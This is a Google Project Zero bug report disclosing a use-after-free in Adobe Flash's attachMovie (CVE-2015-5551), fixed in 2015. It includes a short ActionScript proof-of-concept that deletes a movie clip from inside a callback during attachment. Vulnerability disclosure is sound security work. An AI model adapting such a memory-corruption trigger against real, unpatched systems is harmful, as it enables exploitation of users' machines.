391 - Adobe Flash: Use-after-free in attachMovie - project-zero

Starred by 2 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	Aug 2015
Cc:	project-...@google.com
Id-3738 Finder-natashenka Deadline-90 Reported-2015-May-21 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe CVE-2015-5551

Adobe Flash: Use-after-free in attachMovie

Project Member Reported by natashenka@google.com, May 19 2015

Back to list

There is a use-after-free in attachMovie due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is as follows:

n = {_quality : {toString : func}};
function func(){
	
	trace("hello");
	
	newResetButton.removeMovieClip();
	return "test";
	}
	
_root.attachMovie("myResetButton","newResetButton",200, n);

A sample fla and swf are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

attachMovie.swf
1.0 KB Download

attachMovie.fla
7.3 KB Download

Project Member Comment 1 by natashenka@google.com, May 22 2015

Labels: -Reported-2015-May-18 Reported-2015-May-21

Comment 2 by cevans@google.com, May 26 2015

Labels: Id-3738

PSIRT-3738

Project Member Comment 3 by natashenka@google.com, Aug 11 2015

Labels: CVE-2015-5551

Project Member Comment 4 by natashenka@google.com, Aug 11 2015

Status: Fixed

Project Member Comment 5 by natashenka@google.com, Aug 18 2015

Labels: -Restrict-View-Commit

Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

► Sign in to add a comment